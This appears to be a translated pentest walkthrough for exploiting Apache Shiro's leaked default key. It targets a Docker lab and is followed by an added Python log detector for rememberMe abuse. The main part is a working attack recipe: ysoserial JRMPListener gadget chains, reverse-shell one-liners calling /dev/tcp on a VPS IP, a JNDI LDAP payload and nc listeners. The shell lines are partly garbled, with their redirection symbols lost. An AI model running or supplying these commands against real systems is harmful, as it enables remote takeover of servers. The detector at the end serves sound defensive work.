Title: Shiro leaks key dependency-free chain utilization techniques

Get the environment:

Pull the mirror to the local

$ docker pull medicean/vulapps:s_shiro_1

Start the environment

$ docker run -d -p 80:8080 medicean/vulapps:s_shiro_1

1. Use the shiro_attack_2.2 tool to check the target system; it found a default key but no usable utilization chain.

2. Use shiro_tool.jar to detect the target system directly. After detection completes, the executable operations are returned.

java -jar shiro_tool.jar http://10.11.10.108:8081/login.jsp

2. Select 0 and enter the dnslog address. The dnslog test shows an echo. One note here: some sites intercept http://dnslog.cn/, so you can switch to several dnslog platforms to test.

DNSlog has echoes. Next, I will get the shell. Because of fixed thinking (I had encountered Linux before), I thought it was Linux, but I didn't use it successfully. At first I thought the firewall was intercepting. Later I detected the directory structure and found that it was Windows, so I had to change the payload here.

3. Use ysoserial to open the port on the public network VPS and execute the rebound command

java -cp ysoserial-master-30099844c6-1.jar ysoserial.exploit.JRMPListener 1999 CommonsCollections5 'Bash command after encoding'

The encoded content here comes from step 4.

Pit 1: CommonsCollections1-5. If the shell does not rebound, use another one instead.

4. Bash rebound command edit

https://x.hacking8.com/java-runtime.html (encoding link)

The following three types of execution commands are selected as appropriate:

Pit 2: The bash command executed here depends first on the other party's operating system. If it is Linux, try the following three. If it is Windows, look up the Windows rebound command on Baidu separately.

bash -i /dev/tcp/VPSIP/7777 01

/bin/bash -i /dev/tcp/VPSIP/7777 01 21

0196;exec 196/dev/tcp/VPSIP/7777; sh 196 196 2196

Here the second type is used: ip is the IP of the VPS that receives the shell, and port is the port on which nc is listening for the rebound.

/bin/bash -i /dev/tcp/192.168.14.222/8888 01 21


Windows: java -cp ysoserial-0.0.6-SNAPSHOT-1.8.3.jar ysoserial.exploit.JRMPListener 88 CommonsBeanutils2 'ldap://VPS address :1389/Basic/Command/Base64/d2hvYW1p'

d2hvYW1p is the base64 of the command; here the executed command is whoami.

java -jar JNDIExploit-1.0-SNAPSHOT.jar -i VPS address

5. NC listening

6. Enter the port opened on the VPS that receives the shell and the port of the java ysoserial JRMPListener (select 1 here, which uses JRMPClient to rebound the shell).

7. Successful execution: the shell rebounds.
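A defender-side detection example, added here and not part of the original post: it scans a constructed request/response log for the two footprints this kind of Shiro attack leaves on the server, oversized rememberMe cookies (gadget-chain payloads run to kilobytes, legitimate cookies do not) and bursts of `rememberMe=deleteMe` responses, which Shiro returns when a cookie cannot be decrypted or deserialized, i.e. what a key/chain scanner like the one in step 1 produces. The log format and thresholds are assumptions for this example.

```python
import re
from collections import Counter

# Constructed sample log (not from the original post). Assumed line format:
# "<client> <method> <path> rememberMe_len=<bytes> set_cookie=<value or ->"
SAMPLE_LOG = """\
10.0.0.5 GET /login.jsp rememberMe_len=0 set_cookie=-
10.0.0.5 POST /login.jsp rememberMe_len=0 set_cookie=rememberMe=QUVTYmxvYg
10.0.0.5 GET /index.jsp rememberMe_len=312 set_cookie=-
10.0.0.9 GET /login.jsp rememberMe_len=4096 set_cookie=rememberMe=deleteMe
10.0.0.9 GET /login.jsp rememberMe_len=4120 set_cookie=rememberMe=deleteMe
10.0.0.9 GET /login.jsp rememberMe_len=4104 set_cookie=rememberMe=deleteMe
10.0.0.9 GET /login.jsp rememberMe_len=4098 set_cookie=rememberMe=deleteMe
10.0.0.7 GET /index.jsp rememberMe_len=296 set_cookie=rememberMe=deleteMe
"""

LINE_RE = re.compile(
    r"^(?P<client>\S+) (?P<method>\S+) (?P<path>\S+) "
    r"rememberMe_len=(?P<clen>\d+) set_cookie=(?P<setc>\S+)$"
)


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["clen"] = int(rec["clen"])
    return rec


def analyze(log_text, max_cookie_len=1024, probe_threshold=3):
    """Return Shiro rememberMe indicators found in the log.

    oversized: requests whose rememberMe cookie exceeds max_cookie_len bytes
               (a serialized gadget chain is far larger than a real cookie).
    probing:   clients that triggered 'rememberMe=deleteMe' at least
               probe_threshold times, the signature of repeated key/chain tries.
    """
    oversized = []
    delete_me = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["clen"] > max_cookie_len:
            oversized.append((rec["client"], rec["path"], rec["clen"]))
        if rec["setc"] == "rememberMe=deleteMe":
            delete_me[rec["client"]] += 1
    probing = sorted(c for c, n in delete_me.items() if n >= probe_threshold)
    return {"oversized": oversized, "probing": probing}
```

A single deleteMe (client 10.0.0.7 above) is normal after a key rotation or an expired cookie; the alert is the repetition from one client combined with oversized cookies.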
